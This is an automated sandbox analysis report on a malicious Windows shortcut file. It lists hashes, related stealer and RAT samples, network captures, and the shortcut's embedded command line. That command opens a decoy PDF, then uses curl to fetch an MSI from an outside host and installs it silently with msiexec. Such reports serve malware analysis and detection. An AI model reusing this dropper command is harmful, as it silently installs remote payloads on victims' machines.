	alex111111.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	104.73.234.102
	alex1231231123.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
	con12312211221.exe	Get hash	malicious	LummaC Stealer	Browse	104.73.234.102
CLOUDFLARENETUS	iJIXzyHnSe.exe	Get hash	malicious	FormBook	Browse	172.67.194.22
	O20L0ptxGs.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.32.1
	DayVXJx1km.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.64.1
	0V0Q7kWH0N.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.96.1
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.32.1
	https://demanddistribution.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	0IrTeguWM7.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	http://rednosehorse.com	Get hash	malicious	Unknown	Browse	1.1.1.1
	NDCNDvC27F.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.48.1
	cexqIzhyvM.exe	Get hash	malicious	GuLoader	Browse	104.21.96.1
AKAMAI-ASN1EU	2_DemonstrateExplain.exe	Get hash	malicious	Unknown	Browse	2.22.242.139
	AyciQgru1X.exe	Get hash	malicious	Remcos	Browse	2.22.242.82
	http://lploverar.best	Get hash	malicious	Unknown	Browse	2.16.168.196
	https://aa1selfstorage.com/ioeloro/?wptouch_switch=mobile&redirect=//gamma.app/docs/Untitled-fw6wys6ubo63z1u?mode=present#card-wdvd2twm5f65uwl	Get hash	malicious	Unknown	Browse	2.16.100.91
	AaxpYFDQ32.exe	Get hash	malicious	Amadey, Credential Flusher, GCleaner, LummaC Stealer, Stealc	Browse	23.197.127.21
	https://aa1selfstorage.com/ioeloro/?wptouch_switch=mobile&redirect=//gamma.app/docs/Untitled-fw6wys6ubo63z1u?mode=present#card-wdvd2twm5f65uwl	Get hash	malicious	Unknown	Browse	2.16.100.106
	file.exe	Get hash	malicious	Vidar	Browse	104.117.182.33
	https://aa1selfstorage.com/ioeloro/?wptouch_switch=mobile&redirect=//gamma.app/docs/Untitled-fw6wys6ubo63z1u?mode=present#card-wdvd2twm5f65uwl	Get hash	malicious	Unknown	Browse	2.16.100.91
	random.exe	Get hash	malicious	LummaC Stealer	Browse	23.197.127.21
	https://shared.outlook.inky.com/link?domain=softlinepk.com&t=h.eJx1zEsOgyAUQNGtGMaNICgfR24F5YFE6zOASZume2_pvON7cl_kSjsZG7KWcuaR0oy-7PGAc2sXvFNya8hW-wEFU-iZVkwJ6hJOZYVljYsN6OPjh9kgZsPtPFvOuLVGa-kEU9qA9Z4ZTzvVd0JKIfp2UJLLeod6D_Cdw3QmdDE8fUyQcb9KxCPXc3Wuur_g_QHH7kBM.MEQCIDdyhBdC30Xhm3ePQG2tnTwypWIRFLJPHxaLdIxX14wmAiBphl0LxJNvkKOBoPckbENzIZIrbLOGeJ4IyT9t346tnw	Get hash	malicious	Unknown	Browse	172.235.181.176
PROINITYPROINITYDE	http://ciso2ciso.com	Get hash	malicious	Unknown	Browse	185.172.148.128
	https://l24.im/RBD8OoV	Get hash	malicious	Unknown	Browse	185.172.148.128
	Final Call Smart Manufacturing Excellence Munich (196Mo).msg	Get hash	malicious	Unknown	Browse	185.172.148.128
	http://drawi.io	Get hash	malicious	Unknown	Browse	185.172.148.132
	Document-0191536.pdf.lnk.download.lnk	Get hash	malicious	Unknown	Browse	185.172.148.128
	Client-built.exe	Get hash	malicious	Quasar	Browse	185.172.148.96
	t7f6VkkOBd.exe	Get hash	malicious	Quasar	Browse	185.172.148.96
	http://productsthatcount.com	Get hash	malicious	Unknown	Browse	185.172.148.128
	Client-built.exe	Get hash	malicious	Quasar	Browse	185.172.148.96
	http://idyllic-elf-955535.netlify.app/	Get hash	malicious	Unknown	Browse	185.172.148.128

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	41976
Entropy (8bit):	6.090971842355162
Encrypted:	false
SSDEEP:	768:lDXzgWPsj/qlGJqIY8GB4kWL+i1zNtPMe5FCLXkVWJDSgzMMd6qD47u3+Ciol:l/Ps+wsI7ynYCtSmd6qE7lFol
MD5:	109FA8C6BA337DA4A3D49E960B3B31D3
SHA1:	C72913D250CCE1604C3947615C0180E326F2BCAB
SHA-256:	E831E7500737F6BA111EF2D24B2C588BB87829A5E52D1D3828513DA4B755DEA5
SHA-512:	D292ED85C0BF4D2B9F608E235BBEC0ABAED672925D2F93DE21BAA891A76B1FC87416D9E0926D14828DABC0CF4251D0F3573C52A7EC54873F2CF3CA7C4EBD5BEA
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13385827393485262","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

Process:	C:\Windows\System32\curl.exe
File Type:	HTML document, ASCII text, with very long lines (394)
Category:	dropped
Size (bytes):	4563
Entropy (8bit):	5.038738653480832
Encrypted:	false
SSDEEP:	96:1j9jwIjYjUDK/D5DMF+BOiUAtc3ZLmmLrR89PaQxJbGD:1j9jhjYjIK/Vo+trc3Z6mLre9ieJGD
MD5:	2D55A0DD79D9D6B7CFE3610C5ADE5266
SHA1:	3F80999C30F814242A72CEABB1E99D568C920F59
SHA-256:	D2B229CD9E1848FF187B9D19EF14A14840AC9916F05C4DECDF019E7FA081A805
SHA-512:	243AEA68461163E3C2C966CBD7A8517E8AEF191085C7DD21F7FA849A6C7F770F3FA231D73513915A5622D9DCE6403ACCD6183F909B13C92DF7469344B2E77763
Malicious:	true
Yara Hits:	Rule: JoeSecurity_BlockedWebSite, Description: Yara detected BlockedWebSite, Source: C:\Users\user\AppData\Local\Temp\bosfortuy.ms, Author: Joe Security
Preview:	<!DOCTYPE html>. [if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->. [if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->. [if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->. [if gt IE 8]> > <html class="no-js" lang="en-US"> <![endif]-->.<head>.<title>Suspected phishing site \| Cloudflare</title>.<meta charset="UTF-8" />.<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge" />.<meta name="robots" content="noindex, nofollow" />.<meta name="viewport" content="width=device-width,initial-scale=1" />.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />. [if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]-->.<style>body{margin:0;padding:0}</style>... [if gte IE 10]> >.<script>. if (!navigator.cookieEnabled) {. window.addEventListener('DOMContentLoaded

File type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=11, Archive, ctime=Tue May 21 09:01:42 2024, mtime=Wed Mar 5 13:11:39 2025, atime=Tue May 21 09:01:42 2024, length=289792, window=hidenormalshowminimized
Entropy (8bit):	2.8492174919583526
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	thUKanu6GD.lnk
File size:	3'047 bytes
MD5:	0a9302f5cbdcc6a3d75a904c947c9147
SHA1:	7ede6ba3382299dc117f82aced5e51b1a0a01d24
SHA256:	e95e5480b291b646297e1bcbd6ab0eb3e4fec53084b714c26271973403e010f7
SHA512:	c93f96ce14e1dcc17ce229fcd3757b2e81b1e3f227653d857ddc5a559a5ab8368dbd76d645fdd35c0fbd26fa84db00e5759cc3e28ae3136ad939710be3dd2ab8
SSDEEP:	24:8xsiJlbs/GzAMUsx+/5+XvynChT9nuYZMk/Sbdd+5CwiXuHY8x8YUmsx:8jSM4OvyCXnuYZMk2dyRiXuHLU
TLSH:	9C51DE122FE90724E3F79D3AA47697159637B486ED22CA5C01A181480896651FC35FBF
File Content Preview:	L..................F.B.. ...\n..e...r.t.........e....l......................5....P.O. .:i.....+00.../C:\...................V.1.....[Z{...Windows.@........OwHeZ.q..............................W.i.n.d.o.w.s.....Z.1.....dZjc..System32..B........OwHeZ!q......

General
Relative Path:	..\..\..\Windows\System32\cmd.exe
Command Line Argument:	/k start msedge https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf & curl -sLo %TEMP%\bosfortuy.ms http://559236.na3.to/gift/setup4391.msi & msiexec /i %TEMP%\bosfortuy.ms /qn \| Taskkill /f /im cmd.exe
Icon location:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 21:40:03.378036976 CET	51189	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:03.390443087 CET	53	51189	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:08.934250116 CET	62846	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:08.934431076 CET	62677	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:08.965178013 CET	53	62846	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:08.965195894 CET	53	62677	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:12.468825102 CET	49323	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:12.469073057 CET	56603	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:12.469371080 CET	49553	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:12.469615936 CET	63079	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:12.476507902 CET	53	49323	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:12.476752996 CET	53	56603	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:12.476763964 CET	53	49553	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:12.477230072 CET	53	63079	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:12.499445915 CET	65386	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:12.499849081 CET	56361	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:12.506556034 CET	53	65386	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:12.508052111 CET	53	56361	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:12.545586109 CET	65177	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:12.545758963 CET	61664	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:12.552663088 CET	53	65177	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:12.553546906 CET	53	61664	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:12.675025940 CET	60489	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:12.675198078 CET	57017	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:40:12.682665110 CET	53	57017	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:12.683876991 CET	53	60489	1.1.1.1	192.168.2.6
Mar 7, 2025 21:40:15.599584103 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:15.901376009 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.080765963 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.081180096 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.081192970 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.081940889 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.083198071 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.083395958 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.084265947 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.084553003 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.084682941 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.084682941 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.084955931 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.085176945 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.184118986 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.184231997 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.184241056 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.184250116 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.184266090 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.184823036 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.185000896 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.187860012 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.189266920 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.189975977 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.190248966 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.190685987 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.192086935 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.192325115 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.192795992 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.202830076 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.203124046 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:16.285679102 CET	443	52145	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:16.327254057 CET	52145	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:19.969847918 CET	53449	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:19.972593069 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:19.973639965 CET	53449	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:19.975089073 CET	53449	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:19.975296021 CET	53449	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:20.284426928 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:20.430608988 CET	443	53449	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:20.431272984 CET	53449	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:20.432303905 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.432328939 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.432992935 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.433012962 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.433409929 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:20.434922934 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:20.434998035 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:20.435286999 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:20.435409069 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:20.462753057 CET	53449	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:20.528553963 CET	443	53449	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:20.528574944 CET	443	53449	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:20.528584957 CET	443	53449	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:20.528774977 CET	443	53449	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:20.528963089 CET	53449	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:20.529046059 CET	53449	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:20.532202959 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.532215118 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.532224894 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.532233000 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.532599926 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:20.532669067 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:20.532919884 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.534207106 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.534377098 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.534804106 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:20.663058043 CET	443	53449	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:20.663490057 CET	53449	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:40:20.664532900 CET	443	62908	162.159.61.3	192.168.2.6
Mar 7, 2025 21:40:20.696922064 CET	62908	443	192.168.2.6	162.159.61.3
Mar 7, 2025 21:40:20.761797905 CET	443	53449	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:20.762860060 CET	443	53449	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:20.763335943 CET	443	53449	172.64.41.3	192.168.2.6
Mar 7, 2025 21:40:20.763518095 CET	53449	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:00.187814951 CET	138	138	192.168.2.6	192.168.2.255
Mar 7, 2025 21:41:12.183666945 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:12.183798075 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:12.184051037 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:12.184139967 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:12.407902002 CET	53	55585	1.1.1.1	192.168.2.6
Mar 7, 2025 21:41:12.716094017 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:12.717875004 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:12.747952938 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:12.815478086 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:12.815496922 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:12.815506935 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:12.815515995 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:12.815987110 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:12.816039085 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:12.913094997 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:12.913520098 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:13.013473988 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:13.013493061 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:13.013808012 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:13.017411947 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:13.901578903 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:13.901578903 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:14.001485109 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:14.013150930 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:14.013165951 CET	443	60361	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:14.013600111 CET	60361	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:51.968811989 CET	64452	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:41:51.968977928 CET	62941	53	192.168.2.6	1.1.1.1
Mar 7, 2025 21:41:51.975970984 CET	53	62941	1.1.1.1	192.168.2.6
Mar 7, 2025 21:41:51.976294994 CET	53	64452	1.1.1.1	192.168.2.6
Mar 7, 2025 21:41:51.977205992 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:51.977335930 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:51.977544069 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:51.977641106 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:52.385088921 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:52.437402010 CET	443	49908	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:52.438122034 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:52.463212967 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:52.483177900 CET	443	49908	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:52.483195066 CET	443	49908	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:52.483205080 CET	443	49908	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:52.483210087 CET	443	49908	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:52.483757973 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:52.483792067 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:52.483835936 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:52.483891010 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:52.537055969 CET	443	49908	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:52.572578907 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:52.581677914 CET	443	49908	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:52.582024097 CET	49908	443	192.168.2.6	172.64.41.3
Mar 7, 2025 21:41:52.681190968 CET	443	49908	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:52.682311058 CET	443	49908	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:52.682638884 CET	443	49908	172.64.41.3	192.168.2.6
Mar 7, 2025 21:41:52.683002949 CET	49908	443	192.168.2.6	172.64.41.3

Timestamp	Bytes transferred	Direction	Data
Mar 7, 2025 21:40:03.420008898 CET	95	OUT	GET /gift/setup4391.msi HTTP/1.1 Host: 559236.na3.to User-Agent: curl/7.83.1 Accept: /
Mar 7, 2025 21:40:03.891622066 CET	1236	IN	HTTP/1.1 403 Forbidden Date: Fri, 07 Mar 2025 20:40:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bk8D4yWya%2Fjc5IrEFAz%2Fp3eIVrswZsx1TQSQ8eGXyw81zSLyuWgJV4rIlEZ1avWrvHaaF8Be3JUY40BSpBHO8q8svSS8ln%2F2mWbmOtW0k1vzLVnw0yLGmja%2B2v4xGTb9"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cce7dffed94217-EWR Data Raw: 31 31 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 [TRUNCATED] Data Ascii: 11d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site \| Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf
Mar 7, 2025 21:40:03.891638041 CET	224	IN	Data Raw: 5f 73 74 79 6c 65 73 2d 63 73 73 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 63 73 73 22 20 2f 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 39 5d 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 Data Ascii: _styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte
Mar 7, 2025 21:40:03.891649008 CET	1236	IN	Data Raw: 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 Data Ascii: IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert'); cookieEl.style.display = 'block'; }) }</script><!
Mar 7, 2025 21:40:03.891668081 CET	224	IN	Data Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f Data Ascii: > <p> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More<
Mar 7, 2025 21:40:03.891688108 CET	1236	IN	Data Raw: 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 Data Ascii: /a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain"> <input type="hidden" name="atok" value="AgMO0ufWWrqeV7iwa74v9K1X9M4pbA99JeG_rHbo1Gc-17413
